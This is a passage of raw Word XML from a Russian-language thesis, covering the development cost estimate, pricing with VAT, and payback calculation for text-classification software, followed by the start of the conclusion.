      </w:r>
      <w:r w:rsidR="004B218D">
        <w:t xml:space="preserve"> рассчитывается по формуле 18</w:t>
      </w:r>
      <w:r w:rsidRPr="002F0D96">
        <w:t>. Рассчитаем себестоимость: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9067" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="004B218D" w:rsidRDefault="00F870DF"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tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="277" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="004B218D" w:rsidRDefault="004B218D" w:rsidP="004B218D">
            <w:pPr>
              <w:pStyle w:val="14"/>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="right"/>
            </w:pPr>
            <w:r>
              <w:t>(18)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00042E55" w:rsidRPr="00E369AE" w:rsidRDefault="00E369AE" w:rsidP="00F054DE">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="66" w:name="_Toc61505574"/>
      <w:r>
        <w:t>Общая смета затрат на разработку проекта</w:t>
      </w:r>
      <w:bookmarkEnd w:id="66"/>
    </w:p>
    <w:p w:rsidR="00F07BA9" w:rsidRDefault="00E369AE" w:rsidP="00C02ECB">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r w:rsidRPr="001354A0">
        <w:t>Результаты расчета затрат на разработку программного обеспечения для информационного поиска и классификации текстов предс</w:t>
      </w:r>
      <w:r w:rsidR="000D5530">
        <w:t>тавлены в таблице 20</w:t>
      </w:r>
      <w:r w:rsidRPr="001354A0">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E369AE" w:rsidRDefault="00E369AE" w:rsidP="00B05C12">
      <w:pPr>
        <w:pStyle w:val="aff0"/>
      </w:pPr>
      <w:r>
        <w:t>Таблица</w:t>
      </w:r>
      <w:r w:rsidR="000D5530">
        <w:t xml:space="preserve"> 20</w:t>
      </w:r>
      <w:r w:rsidRPr="00B007AA">
        <w:t xml:space="preserve"> – Смета затрат на разработку проекта.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9364" w:type="dxa"/>
        <w:tblInd w:w="-20" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3102"/>
        <w:gridCol w:w="1974"/>
        <w:gridCol w:w="2385"/>
        <w:gridCol w:w="1903"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E369AE" w:rsidRPr="00A20B3A" w:rsidTr="00C02ECB">
        <w:trPr>
          <w:trHeight w:val="121"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="312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Статья затрат</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Обозначение</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2411"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Величина затрат (руб.)</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 затрат к итогу</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E369AE" w:rsidRPr="00A20B3A" w:rsidTr="00C02ECB">
        <w:trPr>
          <w:trHeight w:val="75"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3129"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Затраты на основные материалы</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1984"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С</w:t>
            </w:r>
            <w:r w:rsidRPr="00A20B3A">
              <w:rPr>
                <w:vertAlign w:val="subscript"/>
              </w:rPr>
              <w:t>мат</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2411"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1345.00</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0.29%</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C02ECB" w:rsidRPr="00C02ECB" w:rsidTr="00C02ECB">
        <w:trPr>
          <w:trHeight w:val="75"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3129"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1984"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2411"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0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00C02ECB" w:rsidRPr="00C02ECB" w:rsidRDefault="00C02ECB" w:rsidP="00DE6727">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C02ECB" w:rsidRPr="00A20B3A" w:rsidTr="00C02ECB">
        <w:trPr>
          <w:trHeight w:val="355"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9364" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00C02ECB" w:rsidRPr="00A20B3A" w:rsidRDefault="00C02ECB" w:rsidP="00C02ECB">
            <w:pPr>
              <w:pStyle w:val="aff0"/>
            </w:pPr>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>Продолжение таблица 20</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C02ECB" w:rsidRPr="00A20B3A" w:rsidTr="00F07BA9">
        <w:trPr>
          <w:trHeight w:val="355"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3129" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00C02ECB" w:rsidRPr="00A20B3A" w:rsidRDefault="00C02ECB" w:rsidP="00C02ECB">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="00A20B3A">
              <w:t>Статья затрат</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1984" w:type="dxa"/>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Обозначение</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2411" w:type="dxa"/>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Величина затрат (руб.)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00C02ECB" w:rsidRPr="00A20B3A" w:rsidRDefault="00C02ECB" w:rsidP="00C02ECB">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="00A20B3A">
              <w:t>% затрат к итогу</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C02ECB" w:rsidRPr="00A20B3A" w:rsidTr="00F07BA9">
        <w:trPr>
          <w:trHeight w:val="355"/>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Основная заработная плата</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осн</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222956.00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47.40%</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C02ECB" w:rsidRPr="00A20B3A" w:rsidTr="00F07BA9">
        <w:trPr>
          <w:trHeight w:val="239"/>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Дополнительная заработная плата</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доп</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33443.40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7.11%</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C02ECB" w:rsidRPr="00A20B3A" w:rsidTr="00F07BA9">
        <w:trPr>
          <w:trHeight w:val="383"/>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Отчисления от заработной платы</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отч</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76919.90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16.35%</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C02ECB" w:rsidRPr="00A20B3A" w:rsidTr="00F07BA9">
        <w:trPr>
          <w:trHeight w:val="323"/>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Накладные расходы</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накл</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133773.80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28.44%</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C02ECB" w:rsidRPr="00A20B3A" w:rsidTr="00F07BA9">
        <w:trPr>
          <w:trHeight w:val="271"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3129"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Машинное время</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="198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м.вр</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2411"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1963.44</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0.42%</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C02ECB" w:rsidRPr="00A20B3A" w:rsidTr="00F07BA9">
        <w:trPr>
          <w:trHeight w:val="120"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3129" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="auto"/>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Итого</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1984"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разр</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2411"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470401.54</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>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100,00%</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C02ECB" w:rsidRPr="00A20B3A" w:rsidTr="00677E44">
        <w:trPr>
          <w:trHeight w:val="182"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3129" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00C02ECB" w:rsidRPr="00A20B3A" w:rsidRDefault="00C02ECB" w:rsidP="00C02ECB">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1984" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00C02ECB" w:rsidRPr="00A20B3A" w:rsidRDefault="00C02ECB" w:rsidP="00C02ECB">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2411" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00C02ECB" w:rsidRPr="00A20B3A" w:rsidRDefault="00C02ECB" w:rsidP="00C02ECB">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00C02ECB" w:rsidRPr="00A20B3A" w:rsidRDefault="00C02ECB" w:rsidP="00C02ECB">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="002B6996" w:rsidRDefault="002B6996" w:rsidP="001354A0">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Как мы видим, себестоимость разработки составляет 470401,5 рубля. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E369AE" w:rsidRPr="002B6996" w:rsidRDefault="002B6996" w:rsidP="00F054DE">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="67" w:name="_Toc61505575"/>
      <w:r w:rsidRPr="00034DA6">
        <w:t>Расчет окупаемости программного обеспечения</w:t>
      </w:r>
      <w:bookmarkEnd w:id="67"/>
    </w:p>
    <w:p w:rsidR="002B6996" w:rsidRDefault="002B6996" w:rsidP="001354A0">
      <w:pPr>
        <w:pStyle w:val="14"/>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2B6996">
        <w:t>) может быть рассчитана по формуле</w:t>
      </w:r>
      <w:r w:rsidR="004B218D">
        <w:t xml:space="preserve"> 19</w:t>
      </w:r>
      <w:r w:rsidRP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9067" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="004B218D" w:rsidRDefault="00F870DF" w:rsidP="004B218D">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4B218D" w:rsidRPr="00034DA6">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="277" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="004B218D" w:rsidRDefault="004B218D" w:rsidP="004B218D">
            <w:pPr>
              <w:pStyle w:val="14"/>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>(19)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00DE45F9" w:rsidRDefault="002B6996" w:rsidP="004B218D">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00034DA6">
        <w:t>где</w:t>
      </w:r>
      <w:r w:rsidR="00DE45F9">
        <w:t xml:space="preserve">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034DA6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DE45F9">
        <w:t>– оптовая цена;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002B6996" w:rsidRDefault="00F870DF"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oMath>
      <w:r w:rsidR="002B6996" w:rsidRPr="00034DA6">
        <w:t xml:space="preserve"> – себестоимость разработки программы;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE45F9" w:rsidRPr="00034DA6" w:rsidRDefault="00DE45F9" w:rsidP="004B218D">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <m:oMath>
        <m:r>
          <w:rPr>
            <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Times New Roman"/>
          </w:rPr>
          <m:t>n</m:t>
        </m:r>
      </m:oMath>
      <w:r>
        <w:t xml:space="preserve"> – количество реализованных программ;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002B6996" w:rsidRDefault="00F870DF"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oMath>
      <w:r w:rsidR="004B218D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002B6996" w:rsidRPr="00034DA6">
        <w:t>– прибыль, определяется по формуле</w:t>
      </w:r>
      <w:r w:rsidR="004B218D">
        <w:t xml:space="preserve"> 20</w:t>
      </w:r>
      <w:r w:rsid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4B218D" w:rsidTr="004B218D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8926" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="004B218D" w:rsidRDefault="00F870DF"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4B218D" w:rsidRPr="00034DA6">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> ,</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="418" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="004B218D" w:rsidRDefault="004B218D" w:rsidP="004B218D">
            <w:pPr>
              <w:pStyle w:val="14"/>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="right"/>
            </w:pPr>
            <w:r>
              <w:t>(20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="002B6996" w:rsidRPr="00034DA6" w:rsidRDefault="002B6996" w:rsidP="004B218D">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00034DA6">
        <w:t xml:space="preserve">где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xml:space="preserve"> – средний уровень рентабельности, принимается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20%;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002B6996" w:rsidRDefault="002B6996" w:rsidP="001354A0">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r w:rsidRPr="00034DA6">
        <w:t>Таким образом, при среднем расчётном количестве реализованных программ n = 20 оптовая цена составит:</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F870DF" w:rsidP="00DE45F9">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="708"/>
              <w:jc w:val="both"/>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tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="002B6996" w:rsidRDefault="002B6996" w:rsidP="001354A0">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r w:rsidRPr="00034DA6">
        <w:t>Отпускная оптовая цена реализации программы потребителям должна включать налог на добавленную стоимость (НДС) и рассчитывается по формуле</w:t>
      </w:r>
      <w:r w:rsidR="00DE45F9">
        <w:t xml:space="preserve"> 21</w:t>
      </w:r>
      <w:r w:rsidRPr="00034DA6">
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="002B6996">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DE45F9" w:rsidTr="00DE45F9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9067" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00DE45F9" w:rsidRDefault="00F870DF"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DE45F9" w:rsidRPr="00034DA6">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="277" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00DE45F9" w:rsidRDefault="00DE45F9" w:rsidP="00DE45F9">
            <w:pPr>
              <w:pStyle w:val="14"/>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="right"/>
            </w:pPr>
            <w:r>
              <w:t>(21)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="002B6996" w:rsidRDefault="002B6996" w:rsidP="00DE45F9">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00034DA6">
        <w:t xml:space="preserve">где НДС – налог на добавленную стоимость рассчитывается в соответствии с </w:t>
      </w:r>
      <w:r w:rsidRPr="00034DA6">
        <w:lastRenderedPageBreak/>
        <w:t>действующей ставкой этого налога:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 20</w:t>
      </w:r>
      <w:r w:rsidRPr="00034DA6">
        <w:t>% от оптовой цены программы.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 xml:space="preserve">НДС = </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>5644,8</w:t>
            </w:r>
            <w:r w:rsidRPr="00034DA6">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> руб.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>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tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="002B6996" w:rsidRPr="00034DA6" w:rsidRDefault="002B6996" w:rsidP="001354A0">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r w:rsidRPr="00034DA6">
        <w:t xml:space="preserve">Таким образом, отпускная цена программы составит </w:t>
      </w:r>
      <w:r>
        <w:t>28224,1руб</w:t>
      </w:r>
      <w:r w:rsidRPr="00034DA6">
        <w:t xml:space="preserve">., в том числе НДС – </w:t>
      </w:r>
      <w:r>
        <w:t>5644,8</w:t>
      </w:r>
      <w:r w:rsidRPr="00034DA6">
        <w:t xml:space="preserve"> руб.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002B6996" w:rsidRDefault="002B6996" w:rsidP="001354A0">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r w:rsidRPr="00034DA6">
        <w:t>Затраты на внедрение системы (</w:t>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внедр</m:t>
            </m:r>
          </m:sub>
        </m:sSub>
      </m:oMath>
      <w:r w:rsidRPr="00034DA6">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F870DF" w:rsidP="00DE45F9">
            <w:pPr>
              <w:pStyle w:val="14"/>
              <w:ind w:firstLine="0"/>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DE45F9" w:rsidRPr="00034DA6">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>руб.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="002B6996" w:rsidRDefault="002B6996" w:rsidP="001354A0">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r w:rsidRPr="00034DA6">
        <w:t>Итак, затраты на сопровождение системы (С</w:t>
      </w:r>
      <w:r w:rsidRPr="00221FF4">
        <w:rPr>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t>сопр</w:t>
      </w:r>
      <w:r w:rsidRPr="00034DA6">
        <w:t>) зависят только от затрат на оплату труда. Однако покупка пакета поддержки не является обязательной услугой.</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F870DF"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DE45F9" w:rsidRPr="00034DA6">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>руб.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00DE45F9" w:rsidRDefault="002B6996" w:rsidP="001354A0">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r w:rsidRPr="00034DA6">
        <w:t>Для расчета срока окупаемости систем используют формулу</w:t>
      </w:r>
      <w:r w:rsidR="00DE45F9">
        <w:t xml:space="preserve"> 22</w:t>
      </w:r>
      <w:r w:rsidRPr="00034DA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1"/>
        <w:gridCol w:w="683"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DE45F9" w:rsidTr="00C64873">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9067" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00DE45F9" w:rsidRDefault="00DE45F9" w:rsidP="00DE45F9">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="708"/>
              <w:jc w:val="cente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tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="277" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00DE45F9" w:rsidRDefault="00DE45F9" w:rsidP="00DE45F9">
            <w:pPr>
              <w:pStyle w:val="14"/>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="right"/>
            </w:pPr>
            <w:r>
              <w:t>(22)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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где </w:t>
      </w:r>
      <m:oMath>
        <m:r>
          <w:rPr>
            <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Times New Roman"/>
          </w:rPr>
          <m:t>T</m:t>
        </m:r>
      </m:oMath>
      <w:r w:rsidRPr="00034DA6">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> – срок окупаемости системы;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002B6996" w:rsidRDefault="00C64873" w:rsidP="002B6996">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <m:oMath>
        <m:r>
          <w:rPr>
            <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Times New Roman"/>
          </w:rPr>
          <m:t>Z</m:t>
        </m:r>
      </m:oMath>
      <w:r w:rsidRPr="00034DA6">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002B6996" w:rsidRPr="00034DA6">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>– ожидаемая прибыль</w:t>
      </w:r>
      <w:r w:rsidR="002B6996">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> (28224,1</w:t>
      </w:r>
      <w:r w:rsidR="002B6996" w:rsidRPr="00034DA6">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002B6996">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>руб./мес.)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af1"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9344"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C64873" w:rsidTr="00C64873">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9344" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00C64873" w:rsidRDefault="00C64873" w:rsidP="00C64873">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tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="002B6996" w:rsidRDefault="002B6996" w:rsidP="00F054DE">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="68" w:name="_Toc61505576"/>
      <w:r>
        <w:t xml:space="preserve">Выводы </w:t>
      </w:r>
      <w:r w:rsidR="00822323">
        <w:t>четвертого</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> раздела</w:t>
      </w:r>
      <w:bookmarkEnd w:id="68"/>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9D41FE" w:rsidRDefault="002B6996" w:rsidP="00135EB8">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>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p>
    <w:p w:rsidR="009D41FE" w:rsidRDefault="009D41FE">
      <w:pPr>
        <w:widowControl/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="851"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="000853C0" w:rsidRDefault="004A5FE1" w:rsidP="00E70973">
      <w:pPr>
        <w:pStyle w:val="110"/>
      </w:pPr>
      <w:bookmarkStart w:id="69" w:name="_Toc61505577"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>ЗАКЛЮЧЕНИЕ</w:t>
      </w:r>
      <w:bookmarkEnd w:id="69"/>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 xml:space="preserve">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w:t>
      </w:r>
      <w:r w:rsidR="00E11CE6">
        <w:t xml:space="preserve">и мониторинга </w:t>
      </w:r>
      <w:r>
        <w:t>ИБ в процессе его эксплуатации.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E11CE6" w:rsidRDefault="00496919" w:rsidP="00E11CE6">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 xml:space="preserve">Для выделения наиболее эффективного средства из рассмотренных был проведен их анализ методом иерархий, по итогу которого было определено </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
